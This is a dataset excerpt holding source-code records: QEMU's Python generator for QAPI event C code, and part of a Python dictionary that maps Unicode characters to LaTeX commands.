text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
#
# QAPI event generator
#
# Copyright (c) 2014 Wenchao Xia
# Copyright (c) 2015-2016 Red Hat Inc.
#
# Authors:
# Wenchao Xia <wenchaoqemu@gmail.com>
# Markus Armbruster <armbru@redhat.com>
#
# This work is licensed under the terms of the GNU GPL, version 2.
# See the COPYING file in the top-level directory.
from qapi import *
def gen_event_send_proto(name, arg_type):
return 'void qapi_event_send_%(c_name)s(%(param)s)' % {
'c_name': c_name(name.lower()),
'param': gen_params(arg_type, 'Error **errp')}
def gen_event_send_decl(name, arg_type):
return mcgen('''
%(proto)s;
''',
proto=gen_event_send_proto(name, arg_type))
def gen_event_send(name, arg_type):
ret = mcgen('''
%(proto)s
{
QDict *qmp;
Error *err = NULL;
QMPEventFuncEmit emit;
''',
proto=gen_event_send_proto(name, arg_type))
if arg_type and arg_type.members:
ret += mcgen('''
QmpOutputVisitor *qov;
Visitor *v;
QObject *obj;
''')
ret += mcgen('''
emit = qmp_event_get_func_emit();
if (!emit) {
return;
}
qmp = qmp_event_build_dict("%(name)s");
''',
name=name)
if arg_type and arg_type.members:
ret += mcgen('''
qov = qmp_output_visitor_new();
v = qmp_output_get_visitor(qov);
visit_start_struct(v, "%(name)s", NULL, 0, &err);
''',
name=name)
ret += gen_err_check()
ret += gen_visit_fields(arg_type.members, need_cast=True,
label='out_obj')
ret += mcgen('''
out_obj:
visit_end_struct(v, err ? NULL : &err);
if (err) {
goto out;
}
obj = qmp_output_get_qobject(qov);
g_assert(obj);
qdict_put_obj(qmp, "data", obj);
''')
ret += mcgen('''
emit(%(c_enum)s, qmp, &err);
''',
c_enum=c_enum_const(event_enum_name, name))
if arg_type and arg_type.members:
ret += mcgen('''
out:
qmp_output_visitor_cleanup(qov);
''')
ret += mcgen('''
error_propagate(errp, err);
QDECREF(qmp);
}
''')
return ret
class QAPISchemaGenEventVisitor(QAPISchemaVisitor):
def __init__(self):
self.decl = None
self.defn = None
self._event_names = None
def visit_begin(self, schema):
self.decl = ''
self.defn = ''
self._event_names = []
def visit_end(self):
self.decl += gen_enum(event_enum_name, self._event_names)
self.defn += gen_enum_lookup(event_enum_name, self._event_names)
self._event_names = None
def visit_event(self, name, info, arg_type):
self.decl += gen_event_send_decl(name, arg_type)
self.defn += gen_event_send(name, arg_type)
self._event_names.append(name)
(input_file, output_dir, do_c, do_h, prefix, dummy) = parse_command_line()
c_comment = '''
/*
* schema-defined QAPI event functions
*
* Copyright (c) 2014 Wenchao Xia
*
* Authors:
* Wenchao Xia <wenchaoqemu@gmail.com>
*
* This work is licensed under the terms of the GNU LGPL, version 2.1 or later.
* See the COPYING.LIB file in the top-level directory.
*
*/
'''
h_comment = '''
/*
* schema-defined QAPI event functions
*
* Copyright (c) 2014 Wenchao Xia
*
* Authors:
* Wenchao Xia <wenchaoqemu@gmail.com>
*
* This work is licensed under the terms of the GNU LGPL, version 2.1 or later.
* See the COPYING.LIB file in the top-level directory.
*
*/
'''
(fdef, fdecl) = open_output(output_dir, do_c, do_h, prefix,
'qapi-event.c', 'qapi-event.h',
c_comment, h_comment)
fdef.write(mcgen('''
#include "qemu/osdep.h"
#include "qemu-common.h"
#include "%(prefix)sqapi-event.h"
#include "%(prefix)sqapi-visit.h"
#include "qapi/qmp-output-visitor.h"
#include "qapi/qmp-event.h"
''',
prefix=prefix))
fdecl.write(mcgen('''
#include "qapi/error.h"
#include "qapi/qmp/qdict.h"
#include "%(prefix)sqapi-types.h"
''',
prefix=prefix))
event_enum_name = c_name(prefix + "QAPIEvent", protect=False)
schema = QAPISchema(input_file)
gen = QAPISchemaGenEventVisitor()
schema.visit(gen)
fdef.write(gen.defn)
fdecl.write(gen.decl)
close_output(fdef, fdecl)
|
SPICE/qemu
|
scripts/qapi-event.py
|
Python
|
gpl-2.0
| 4,236
|
[
"VisIt"
] |
d7352dad8965dcf7352ba20e204a9a8b60401b194965d7e71340957b3b2b5008
|
# -*- coding: utf-8 -*-
symbols = {'\xc2\xb0':"$^{\\circ}$", u"\\xb2": "^2", u"\\xb3": "^3", u"\\xb1": "$\\pm$", '\\xe2\\x89\\x89': "\\neq"}
# http://www.johndcook.com/unicode_latex.html
# Based on John D. Cook's unicode-to-latex javascript
#
unicode_to_latex_dict = {
u"\u0023":"\\#",
u"\u0024":"\\textdollar",
u"\u0025":"\\%",
u"\u0026":"\\&",
u"\u0027":"\\textquotesingle",
u"\u002A":"\\ast",
u"\u005C":"\\textbackslash",
u"\u005E":"\\^{}",
u"\u005F":"\\_",
u"\u0060":"\\textasciigrave",
u"\u007B":"\\lbrace",
u"\u007C":"\\vert",
u"\u007D":"\\rbrace",
u"\u007E":"\\textasciitilde",
u"\u00A1":"\\textexclamdown",
u"\u00A2":"\\textcent",
u"\u00A3":"\\textsterling",
u"\u00A4":"\\textcurrency",
u"\u00A5":"\\textyen",
u"\u00A6":"\\textbrokenbar",
u"\u00A7":"\\textsection",
u"\u00A8":"\\textasciidieresis",
u"\u00A9":"\\textcopyright",
u"\u00AA":"\\textordfeminine",
u"\u00AB":"\\guillemotleft",
u"\u00AC":"\\lnot",
u"\u00AD":"\\-",
u"\u00AE":"\\textregistered",
u"\u00AF":"\\textasciimacron",
u"\u00B0":"\\textdegree",
u"\u00B1":"\\pm",
u"\u00B2":"{^2}",
u"\u00B3":"{^3}",
u"\u00B4":"\\textasciiacute",
u"\u00B5":"\\mathrm{\\mu}",
u"\u00B6":"\\textparagraph",
u"\u00B7":"\\cdot",
u"\u00B8":"\\c{}",
u"\u00B9":"{^1}",
u"\u00BA":"\\textordmasculine",
u"\u00BB":"\\guillemotright",
u"\u00BC":"\\textonequarter",
u"\u00BD":"\\textonehalf",
u"\u00BE":"\\textthreequarters",
u"\u00BF":"\\textquestiondown",
u"\u00C0":"\\`{A}",
u"\u00C1":"\\\'{A}",
u"\u00C2":"\\^{A}",
u"\u00C3":"\\~{A}",
u"\u00C4":"\\\"{A}",
u"\u00C5":"\\AA",
u"\u00C6":"\\AE",
u"\u00C7":"\\c{C}",
u"\u00C8":"\\`{E}",
u"\u00C9":"\\\'{E}",
u"\u00CA":"\\^{E}",
u"\u00CB":"\\\"{E}",
u"\u00CC":"\\`{I}",
u"\u00CD":"\\\'{I}",
u"\u00CE":"\\^{I}",
u"\u00CF":"\\\"{I}",
u"\u00D0":"\\DH",
u"\u00D1":"\\~{N}",
u"\u00D2":"\\`{O}",
u"\u00D3":"\\\'{O}",
u"\u00D4":"\\^{O}",
u"\u00D5":"\\~{O}",
u"\u00D6":"\\\"{O}",
u"\u00D7":"\\texttimes",
u"\u00D8":"\\O",
u"\u00D9":"\\`{U}",
u"\u00DA":"\\\'{U}",
u"\u00DB":"\\^{U}",
u"\u00DC":"\\\"{U}",
u"\u00DD":"\\\'{Y}",
u"\u00DE":"\\TH",
u"\u00DF":"\\ss",
u"\u00E0":"\\`{a}",
u"\u00E1":"\\\'{a}",
u"\u00E2":"\\^{a}",
u"\u00E3":"\\~{a}",
u"\u00E4":"\\\"{a}",
u"\u00E5":"\\aa",
u"\u00E6":"\\ae",
u"\u00E7":"\\c{c}",
u"\u00E8":"\\`{e}",
u"\u00E9":"\\\'{e}",
u"\u00EA":"\\^{e}",
u"\u00EB":"\\\"{e}",
u"\u00EC":"\\`{\\i}",
u"\u00ED":"\\\'{\\i}",
u"\u00EE":"\\^{\\i}",
u"\u00EF":"\\\"{\\i}",
u"\u00F0":"\\dh",
u"\u00F1":"\\~{n}",
u"\u00F2":"\\`{o}",
u"\u00F3":"\\\'{o}",
u"\u00F4":"\\^{o}",
u"\u00F5":"\\~{o}",
u"\u00F6":"\\\"{o}",
u"\u00F7":"\\div",
u"\u00F8":"\\o",
u"\u00F9":"\\`{u}",
u"\u00FA":"\\\'{u}",
u"\u00FB":"\\^{u}",
u"\u00FC":"\\\"{u}",
u"\u00FD":"\\\'{y}",
u"\u00FE":"\\th",
u"\u00FF":"\\\"{y}",
u"\u0100":"\\={A}",
u"\u0101":"\\={a}",
u"\u0102":"\\u{A}",
u"\u0103":"\\u{a}",
u"\u0104":"\\k{A}",
u"\u0105":"\\k{a}",
u"\u0106":"\\\'{C}",
u"\u0107":"\\\'{c}",
u"\u0108":"\\^{C}",
u"\u0109":"\\^{c}",
u"\u010A":"\\.{C}",
u"\u010B":"\\.{c}",
u"\u010C":"\\v{C}",
u"\u010D":"\\v{c}",
u"\u010E":"\\v{D}",
u"\u010F":"\\v{d}",
u"\u0110":"\\DJ",
u"\u0111":"\\dj",
u"\u0112":"\\={E}",
u"\u0113":"\\={e}",
u"\u0114":"\\u{E}",
u"\u0115":"\\u{e}",
u"\u0116":"\\.{E}",
u"\u0117":"\\.{e}",
u"\u0118":"\\k{E}",
u"\u0119":"\\k{e}",
u"\u011A":"\\v{E}",
u"\u011B":"\\v{e}",
u"\u011C":"\\^{G}",
u"\u011D":"\\^{g}",
u"\u011E":"\\u{G}",
u"\u011F":"\\u{g}",
u"\u0120":"\\.{G}",
u"\u0121":"\\.{g}",
u"\u0122":"\\c{G}",
u"\u0123":"\\c{g}",
u"\u0124":"\\^{H}",
u"\u0125":"\\^{h}",
u"\u0126":"{\\fontencoding{LELA}\\selectfont\\char40}",
u"\u0127":"\\Elzxh",
u"\u0128":"\\~{I}",
u"\u0129":"\\~{\\i}",
u"\u012A":"\\={I}",
u"\u012B":"\\={\\i}",
u"\u012C":"\\u{I}",
u"\u012D":"\\u{\\i}",
u"\u012E":"\\k{I}",
u"\u012F":"\\k{i}",
u"\u0130":"\\.{I}",
u"\u0131":"\\i",
u"\u0132":"IJ",
u"\u0133":"ij",
u"\u0134":"\\^{J}",
u"\u0135":"\\^{\\j}",
u"\u0136":"\\c{K}",
u"\u0137":"\\c{k}",
u"\u0138":"{\\fontencoding{LELA}\\selectfont\\char91}",
u"\u0139":"\\\'{L}",
u"\u013A":"\\\'{l}",
u"\u013B":"\\c{L}",
u"\u013C":"\\c{l}",
u"\u013D":"\\v{L}",
u"\u013E":"\\v{l}",
u"\u013F":"{\\fontencoding{LELA}\\selectfont\\char201}",
u"\u0140":"{\\fontencoding{LELA}\\selectfont\\char202}",
u"\u0141":"\\L",
u"\u0142":"\\l",
u"\u0143":"\\\'{N}",
u"\u0144":"\\\'{n}",
u"\u0145":"\\c{N}",
u"\u0146":"\\c{n}",
u"\u0147":"\\v{N}",
u"\u0148":"\\v{n}",
u"\u0149":"\\'n",
u"\u014A":"\\NG",
u"\u014B":"\\ng",
u"\u014C":"\\={O}",
u"\u014D":"\\={o}",
u"\u014E":"\\u{O}",
u"\u014F":"\\u{o}",
u"\u0150":"\\H{O}",
u"\u0151":"\\H{o}",
u"\u0152":"\\OE",
u"\u0153":"\\oe",
u"\u0154":"\\\'{R}",
u"\u0155":"\\\'{r}",
u"\u0156":"\\c{R}",
u"\u0157":"\\c{r}",
u"\u0158":"\\v{R}",
u"\u0159":"\\v{r}",
u"\u015A":"\\\'{S}",
u"\u015B":"\\\'{s}",
u"\u015C":"\\^{S}",
u"\u015D":"\\^{s}",
u"\u015E":"\\c{S}",
u"\u015F":"\\c{s}",
u"\u0160":"\\v{S}",
u"\u0161":"\\v{s}",
u"\u0162":"\\c{T}",
u"\u0163":"\\c{t}",
u"\u0164":"\\v{T}",
u"\u0165":"\\v{t}",
u"\u0166":"{\\fontencoding{LELA}\\selectfont\\char47}",
u"\u0167":"{\\fontencoding{LELA}\\selectfont\\char63}",
u"\u0168":"\\~{U}",
u"\u0169":"\\~{u}",
u"\u016A":"\\={U}",
u"\u016B":"\\={u}",
u"\u016C":"\\u{U}",
u"\u016D":"\\u{u}",
u"\u016E":"\\r{U}",
u"\u016F":"\\r{u}",
u"\u0170":"\\H{U}",
u"\u0171":"\\H{u}",
u"\u0172":"\\k{U}",
u"\u0173":"\\k{u}",
u"\u0174":"\\^{W}",
u"\u0175":"\\^{w}",
u"\u0176":"\\^{Y}",
u"\u0177":"\\^{y}",
u"\u0178":"\\\"{Y}",
u"\u0179":"\\\'{Z}",
u"\u017A":"\\\'{z}",
u"\u017B":"\\.{Z}",
u"\u017C":"\\.{z}",
u"\u017D":"\\v{Z}",
u"\u017E":"\\v{z}",
u"\u0195":"\\texthvlig",
u"\u019E":"\\textnrleg",
u"\u01AA":"\\eth",
u"\u01BA":"{\\fontencoding{LELA}\\selectfont\\char195}",
u"\u01C2":"\\textdoublepipe",
u"\u01F5":"\\\'{g}",
u"\u0250":"\\Elztrna",
u"\u0252":"\\Elztrnsa",
u"\u0254":"\\Elzopeno",
u"\u0256":"\\Elzrtld",
u"\u0258":"{\\fontencoding{LEIP}\\selectfont\\char61}",
u"\u0259":"\\Elzschwa",
u"\u025B":"\\varepsilon",
u"\u0263":"\\Elzpgamma",
u"\u0264":"\\Elzpbgam",
u"\u0265":"\\Elztrnh",
u"\u026C":"\\Elzbtdl",
u"\u026D":"\\Elzrtll",
u"\u026F":"\\Elztrnm",
u"\u0270":"\\Elztrnmlr",
u"\u0271":"\\Elzltlmr",
u"\u0272":"\\Elzltln",
u"\u0273":"\\Elzrtln",
u"\u0277":"\\Elzclomeg",
u"\u0278":"\\textphi",
u"\u0279":"\\Elztrnr",
u"\u027A":"\\Elztrnrl",
u"\u027B":"\\Elzrttrnr",
u"\u027C":"\\Elzrl",
u"\u027D":"\\Elzrtlr",
u"\u027E":"\\Elzfhr",
u"\u027F":"{\\fontencoding{LEIP}\\selectfont\\char202}",
u"\u0282":"\\Elzrtls",
u"\u0283":"\\Elzesh",
u"\u0287":"\\Elztrnt",
u"\u0288":"\\Elzrtlt",
u"\u028A":"\\Elzpupsil",
u"\u028B":"\\Elzpscrv",
u"\u028C":"\\Elzinvv",
u"\u028D":"\\Elzinvw",
u"\u028E":"\\Elztrny",
u"\u0290":"\\Elzrtlz",
u"\u0292":"\\Elzyogh",
u"\u0294":"\\Elzglst",
u"\u0295":"\\Elzreglst",
u"\u0296":"\\Elzinglst",
u"\u029E":"\\textturnk",
u"\u02A4":"\\Elzdyogh",
u"\u02A7":"\\Elztesh",
u"\u02C7":"\\textasciicaron",
u"\u02C8":"\\Elzverts",
u"\u02CC":"\\Elzverti",
u"\u02D0":"\\Elzlmrk",
u"\u02D1":"\\Elzhlmrk",
u"\u02D2":"\\Elzsbrhr",
u"\u02D3":"\\Elzsblhr",
u"\u02D4":"\\Elzrais",
u"\u02D5":"\\Elzlow",
u"\u02D8":"\\textasciibreve",
u"\u02D9":"\\textperiodcentered",
u"\u02DA":"\\r{}",
u"\u02DB":"\\k{}",
u"\u02DC":"\\texttildelow",
u"\u02DD":"\\H{}",
u"\u02E5":"\\tone{55}",
u"\u02E6":"\\tone{44}",
u"\u02E7":"\\tone{33}",
u"\u02E8":"\\tone{22}",
u"\u02E9":"\\tone{11}",
u"\u0300":"\\`",
u"\u0301":"\\\'",
u"\u0302":"\\^",
u"\u0303":"\\~",
u"\u0304":"\\=",
u"\u0306":"\\u",
u"\u0307":"\\.",
u"\u0308":"\\\"",
u"\u030A":"\\r",
u"\u030B":"\\H",
u"\u030C":"\\v",
u"\u030F":"\\cyrchar\\C",
u"\u0311":"{\\fontencoding{LECO}\\selectfont\\char177}",
u"\u0318":"{\\fontencoding{LECO}\\selectfont\\char184}",
u"\u0319":"{\\fontencoding{LECO}\\selectfont\\char185}",
u"\u0321":"\\Elzpalh",
u"\u0322":"\\Elzrh",
u"\u0327":"\\c",
u"\u0328":"\\k",
u"\u032A":"\\Elzsbbrg",
u"\u032B":"{\\fontencoding{LECO}\\selectfont\\char203}",
u"\u032F":"{\\fontencoding{LECO}\\selectfont\\char207}",
u"\u0335":"\\Elzxl",
u"\u0336":"\\Elzbar",
u"\u0337":"{\\fontencoding{LECO}\\selectfont\\char215}",
u"\u0338":"{\\fontencoding{LECO}\\selectfont\\char216}",
u"\u033A":"{\\fontencoding{LECO}\\selectfont\\char218}",
u"\u033B":"{\\fontencoding{LECO}\\selectfont\\char219}",
u"\u033C":"{\\fontencoding{LECO}\\selectfont\\char220}",
u"\u033D":"{\\fontencoding{LECO}\\selectfont\\char221}",
u"\u0361":"{\\fontencoding{LECO}\\selectfont\\char225}",
u"\u0386":"\\\'{A}",
u"\u0388":"\\\'{E}",
u"\u0389":"\\\'{H}",
u"\u038A":"\\\'{}{I}",
u"\u038C":"\\\'{}O",
u"\u038E":"\\mathrm{\\'Y}",
u"\u038F":"\\mathrm{\\'\\Omega}",
u"\u0390":"\\acute{\\ddot{\\iota}}",
u"\u0391":"\\Alpha",
u"\u0392":"\\Beta",
u"\u0393":"\\Gamma",
u"\u0394":"\\Delta",
u"\u0395":"\\Epsilon",
u"\u0396":"\\Zeta",
u"\u0397":"\\Eta",
u"\u0398":"\\Theta",
u"\u0399":"\\Iota",
u"\u039A":"\\Kappa",
u"\u039B":"\\Lambda",
u"\u039E":"\\Xi",
u"\u03A0":"\\Pi",
u"\u03A1":"\\Rho",
u"\u03A3":"\\Sigma",
u"\u03A4":"\\Tau",
u"\u03A5":"\\Upsilon",
u"\u03A6":"\\Phi",
u"\u03A7":"\\Chi",
u"\u03A8":"\\Psi",
u"\u03A9":"\\Omega",
u"\u03AA":"\\mathrm{\\ddot{I}}",
u"\u03AB":"\\mathrm{\\ddot{Y}}",
u"\u03AC":"\\\'{$\\alpha$}",
u"\u03AD":"\\acute{\\epsilon}",
u"\u03AE":"\\acute{\\eta}",
u"\u03AF":"\\acute{\\iota}",
u"\u03B0":"\\acute{\\ddot{\\upsilon}}",
u"\u03B1":"\\alpha",
u"\u03B2":"\\beta",
u"\u03B3":"\\gamma",
u"\u03B4":"\\delta",
u"\u03B5":"\\epsilon",
u"\u03B6":"\\zeta",
u"\u03B7":"\\eta",
u"\u03B8":"\\texttheta",
u"\u03B9":"\\iota",
u"\u03BA":"\\kappa",
u"\u03BB":"\\lambda",
u"\u03BC":"\\mu",
u"\u03BD":"\\nu",
u"\u03BE":"\\xi",
u"\u03C0":"\\pi",
u"\u03C1":"\\rho",
u"\u03C2":"\\varsigma",
u"\u03C3":"\\sigma",
u"\u03C4":"\\tau",
u"\u03C5":"\\upsilon",
u"\u03C6":"\\varphi",
u"\u03C7":"\\chi",
u"\u03C8":"\\psi",
u"\u03C9":"\\omega",
u"\u03CA":"\\ddot{\\iota}",
u"\u03CB":"\\ddot{\\upsilon}",
u"\u03CC":"\\\'{o}",
u"\u03CD":"\\acute{\\upsilon}",
u"\u03CE":"\\acute{\\omega}",
u"\u03D0":"\\Pisymbol{ppi022}{87}",
u"\u03D1":"\\textvartheta",
u"\u03D2":"\\Upsilon",
u"\u03D5":"\\phi",
u"\u03D6":"\\varpi",
u"\u03DA":"\\Stigma",
u"\u03DC":"\\Digamma",
u"\u03DD":"\\digamma",
u"\u03DE":"\\Koppa",
u"\u03E0":"\\Sampi",
u"\u03F0":"\\varkappa",
u"\u03F1":"\\varrho",
u"\u03F4":"\\textTheta",
u"\u03F6":"\\backepsilon",
u"\u0401":"\\cyrchar\\CYRYO",
u"\u0402":"\\cyrchar\\CYRDJE",
u"\u0403":"\\cyrchar{\\\'\\CYRG}",
u"\u0404":"\\cyrchar\\CYRIE",
u"\u0405":"\\cyrchar\\CYRDZE",
u"\u0406":"\\cyrchar\\CYRII",
u"\u0407":"\\cyrchar\\CYRYI",
u"\u0408":"\\cyrchar\\CYRJE",
u"\u0409":"\\cyrchar\\CYRLJE",
u"\u040A":"\\cyrchar\\CYRNJE",
u"\u040B":"\\cyrchar\\CYRTSHE",
u"\u040C":"\\cyrchar{\\\'\\CYRK}",
u"\u040E":"\\cyrchar\\CYRUSHRT",
u"\u040F":"\\cyrchar\\CYRDZHE",
u"\u0410":"\\cyrchar\\CYRA",
u"\u0411":"\\cyrchar\\CYRB",
u"\u0412":"\\cyrchar\\CYRV",
u"\u0413":"\\cyrchar\\CYRG",
u"\u0414":"\\cyrchar\\CYRD",
u"\u0415":"\\cyrchar\\CYRE",
u"\u0416":"\\cyrchar\\CYRZH",
u"\u0417":"\\cyrchar\\CYRZ",
u"\u0418":"\\cyrchar\\CYRI",
u"\u0419":"\\cyrchar\\CYRISHRT",
u"\u041A":"\\cyrchar\\CYRK",
u"\u041B":"\\cyrchar\\CYRL",
u"\u041C":"\\cyrchar\\CYRM",
u"\u041D":"\\cyrchar\\CYRN",
u"\u041E":"\\cyrchar\\CYRO",
u"\u041F":"\\cyrchar\\CYRP",
u"\u0420":"\\cyrchar\\CYRR",
u"\u0421":"\\cyrchar\\CYRS",
u"\u0422":"\\cyrchar\\CYRT",
u"\u0423":"\\cyrchar\\CYRU",
u"\u0424":"\\cyrchar\\CYRF",
u"\u0425":"\\cyrchar\\CYRH",
u"\u0426":"\\cyrchar\\CYRC",
u"\u0427":"\\cyrchar\\CYRCH",
u"\u0428":"\\cyrchar\\CYRSH",
u"\u0429":"\\cyrchar\\CYRSHCH",
u"\u042A":"\\cyrchar\\CYRHRDSN",
u"\u042B":"\\cyrchar\\CYRERY",
u"\u042C":"\\cyrchar\\CYRSFTSN",
u"\u042D":"\\cyrchar\\CYREREV",
u"\u042E":"\\cyrchar\\CYRYU",
u"\u042F":"\\cyrchar\\CYRYA",
u"\u0430":"\\cyrchar\\cyra",
u"\u0431":"\\cyrchar\\cyrb",
u"\u0432":"\\cyrchar\\cyrv",
u"\u0433":"\\cyrchar\\cyrg",
u"\u0434":"\\cyrchar\\cyrd",
u"\u0435":"\\cyrchar\\cyre",
u"\u0436":"\\cyrchar\\cyrzh",
u"\u0437":"\\cyrchar\\cyrz",
u"\u0438":"\\cyrchar\\cyri",
u"\u0439":"\\cyrchar\\cyrishrt",
u"\u043A":"\\cyrchar\\cyrk",
u"\u043B":"\\cyrchar\\cyrl",
u"\u043C":"\\cyrchar\\cyrm",
u"\u043D":"\\cyrchar\\cyrn",
u"\u043E":"\\cyrchar\\cyro",
u"\u043F":"\\cyrchar\\cyrp",
u"\u0440":"\\cyrchar\\cyrr",
u"\u0441":"\\cyrchar\\cyrs",
u"\u0442":"\\cyrchar\\cyrt",
u"\u0443":"\\cyrchar\\cyru",
u"\u0444":"\\cyrchar\\cyrf",
u"\u0445":"\\cyrchar\\cyrh",
u"\u0446":"\\cyrchar\\cyrc",
u"\u0447":"\\cyrchar\\cyrch",
u"\u0448":"\\cyrchar\\cyrsh",
u"\u0449":"\\cyrchar\\cyrshch",
u"\u044A":"\\cyrchar\\cyrhrdsn",
u"\u044B":"\\cyrchar\\cyrery",
u"\u044C":"\\cyrchar\\cyrsftsn",
u"\u044D":"\\cyrchar\\cyrerev",
u"\u044E":"\\cyrchar\\cyryu",
u"\u044F":"\\cyrchar\\cyrya",
u"\u0451":"\\cyrchar\\cyryo",
u"\u0452":"\\cyrchar\\cyrdje",
u"\u0453":"\\cyrchar{\\\'\\cyrg}",
u"\u0454":"\\cyrchar\\cyrie",
u"\u0455":"\\cyrchar\\cyrdze",
u"\u0456":"\\cyrchar\\cyrii",
u"\u0457":"\\cyrchar\\cyryi",
u"\u0458":"\\cyrchar\\cyrje",
u"\u0459":"\\cyrchar\\cyrlje",
u"\u045A":"\\cyrchar\\cyrnje",
u"\u045B":"\\cyrchar\\cyrtshe",
u"\u045C":"\\cyrchar{\\\'\\cyrk}",
u"\u045E":"\\cyrchar\\cyrushrt",
u"\u045F":"\\cyrchar\\cyrdzhe",
u"\u0460":"\\cyrchar\\CYROMEGA",
u"\u0461":"\\cyrchar\\cyromega",
u"\u0462":"\\cyrchar\\CYRYAT",
u"\u0464":"\\cyrchar\\CYRIOTE",
u"\u0465":"\\cyrchar\\cyriote",
u"\u0466":"\\cyrchar\\CYRLYUS",
u"\u0467":"\\cyrchar\\cyrlyus",
u"\u0468":"\\cyrchar\\CYRIOTLYUS",
u"\u0469":"\\cyrchar\\cyriotlyus",
u"\u046A":"\\cyrchar\\CYRBYUS",
u"\u046C":"\\cyrchar\\CYRIOTBYUS",
u"\u046D":"\\cyrchar\\cyriotbyus",
u"\u046E":"\\cyrchar\\CYRKSI",
u"\u046F":"\\cyrchar\\cyrksi",
u"\u0470":"\\cyrchar\\CYRPSI",
u"\u0471":"\\cyrchar\\cyrpsi",
u"\u0472":"\\cyrchar\\CYRFITA",
u"\u0474":"\\cyrchar\\CYRIZH",
u"\u0478":"\\cyrchar\\CYRUK",
u"\u0479":"\\cyrchar\\cyruk",
u"\u047A":"\\cyrchar\\CYROMEGARND",
u"\u047B":"\\cyrchar\\cyromegarnd",
u"\u047C":"\\cyrchar\\CYROMEGATITLO",
u"\u047D":"\\cyrchar\\cyromegatitlo",
u"\u047E":"\\cyrchar\\CYROT",
u"\u047F":"\\cyrchar\\cyrot",
u"\u0480":"\\cyrchar\\CYRKOPPA",
u"\u0481":"\\cyrchar\\cyrkoppa",
u"\u0482":"\\cyrchar\\cyrthousands",
u"\u0488":"\\cyrchar\\cyrhundredthousands",
u"\u0489":"\\cyrchar\\cyrmillions",
u"\u048C":"\\cyrchar\\CYRSEMISFTSN",
u"\u048D":"\\cyrchar\\cyrsemisftsn",
u"\u048E":"\\cyrchar\\CYRRTICK",
u"\u048F":"\\cyrchar\\cyrrtick",
u"\u0490":"\\cyrchar\\CYRGUP",
u"\u0491":"\\cyrchar\\cyrgup",
u"\u0492":"\\cyrchar\\CYRGHCRS",
u"\u0493":"\\cyrchar\\cyrghcrs",
u"\u0494":"\\cyrchar\\CYRGHK",
u"\u0495":"\\cyrchar\\cyrghk",
u"\u0496":"\\cyrchar\\CYRZHDSC",
u"\u0497":"\\cyrchar\\cyrzhdsc",
u"\u0498":"\\cyrchar\\CYRZDSC",
u"\u0499":"\\cyrchar\\cyrzdsc",
u"\u049A":"\\cyrchar\\CYRKDSC",
u"\u049B":"\\cyrchar\\cyrkdsc",
u"\u049C":"\\cyrchar\\CYRKVCRS",
u"\u049D":"\\cyrchar\\cyrkvcrs",
u"\u049E":"\\cyrchar\\CYRKHCRS",
u"\u049F":"\\cyrchar\\cyrkhcrs",
u"\u04A0":"\\cyrchar\\CYRKBEAK",
u"\u04A1":"\\cyrchar\\cyrkbeak",
u"\u04A2":"\\cyrchar\\CYRNDSC",
u"\u04A3":"\\cyrchar\\cyrndsc",
u"\u04A4":"\\cyrchar\\CYRNG",
u"\u04A5":"\\cyrchar\\cyrng",
u"\u04A6":"\\cyrchar\\CYRPHK",
u"\u04A7":"\\cyrchar\\cyrphk",
u"\u04A8":"\\cyrchar\\CYRABHHA",
u"\u04A9":"\\cyrchar\\cyrabhha",
u"\u04AA":"\\cyrchar\\CYRSDSC",
u"\u04AB":"\\cyrchar\\cyrsdsc",
u"\u04AC":"\\cyrchar\\CYRTDSC",
u"\u04AD":"\\cyrchar\\cyrtdsc",
u"\u04AE":"\\cyrchar\\CYRY",
u"\u04AF":"\\cyrchar\\cyry",
u"\u04B0":"\\cyrchar\\CYRYHCRS",
u"\u04B1":"\\cyrchar\\cyryhcrs",
u"\u04B2":"\\cyrchar\\CYRHDSC",
u"\u04B3":"\\cyrchar\\cyrhdsc",
u"\u04B4":"\\cyrchar\\CYRTETSE",
u"\u04B5":"\\cyrchar\\cyrtetse",
u"\u04B6":"\\cyrchar\\CYRCHRDSC",
u"\u04B7":"\\cyrchar\\cyrchrdsc",
u"\u04B8":"\\cyrchar\\CYRCHVCRS",
u"\u04B9":"\\cyrchar\\cyrchvcrs",
u"\u04BA":"\\cyrchar\\CYRSHHA",
u"\u04BB":"\\cyrchar\\cyrshha",
u"\u04BC":"\\cyrchar\\CYRABHCH",
u"\u04BD":"\\cyrchar\\cyrabhch",
u"\u04BE":"\\cyrchar\\CYRABHCHDSC",
u"\u04BF":"\\cyrchar\\cyrabhchdsc",
u"\u04C0":"\\cyrchar\\CYRpalochka",
u"\u04C3":"\\cyrchar\\CYRKHK",
u"\u04C4":"\\cyrchar\\cyrkhk",
u"\u04C7":"\\cyrchar\\CYRNHK",
u"\u04C8":"\\cyrchar\\cyrnhk",
u"\u04CB":"\\cyrchar\\CYRCHLDSC",
u"\u04CC":"\\cyrchar\\cyrchldsc",
u"\u04D4":"\\cyrchar\\CYRAE",
u"\u04D5":"\\cyrchar\\cyrae",
u"\u04D8":"\\cyrchar\\CYRSCHWA",
u"\u04D9":"\\cyrchar\\cyrschwa",
u"\u04E0":"\\cyrchar\\CYRABHDZE",
u"\u04E1":"\\cyrchar\\cyrabhdze",
u"\u04E8":"\\cyrchar\\CYROTLD",
u"\u04E9":"\\cyrchar\\cyrotld",
u"\u2002":"\\hspace{0.6em}",
u"\u2003":"\\hspace{1em}",
u"\u2004":"\\hspace{0.33em}",
u"\u2005":"\\hspace{0.25em}",
u"\u2006":"\\hspace{0.166em}",
u"\u2007":"\\hphantom{0}",
u"\u2008":"\\hphantom{,}",
u"\u2009":"\\hspace{0.167em}",
u"\u2009-0200A-0200A":"\\;",
u"\u200A":"\\mkern1mu",
u"\u2013":"\\textendash",
u"\u2014":"\\textemdash",
u"\u2015":"\\rule{1em}{1pt}",
u"\u2016":"\\Vert",
u"\u201B":"\\Elzreapos",
u"\u201C":"\\textquotedblleft",
u"\u201D":"\\textquotedblright",
u"\u201E":",,",
u"\u2020":"\\textdagger",
u"\u2021":"\\textdaggerdbl",
u"\u2022":"\\textbullet",
u"\u2025":"..",
u"\u2026":"\\ldots",
u"\u2030":"\\textperthousand",
u"\u2031":"\\textpertenthousand",
u"\u2032":"{\\'}",
u"\u2033":"{\\'\\'}",
u"\u2034":"{\\'\\'\\'}",
u"\u2035":"\\backprime",
u"\u2039":"\\guilsinglleft",
u"\u203A":"\\guilsinglright",
u"\u2057":"\\'\\'\\'\\'",
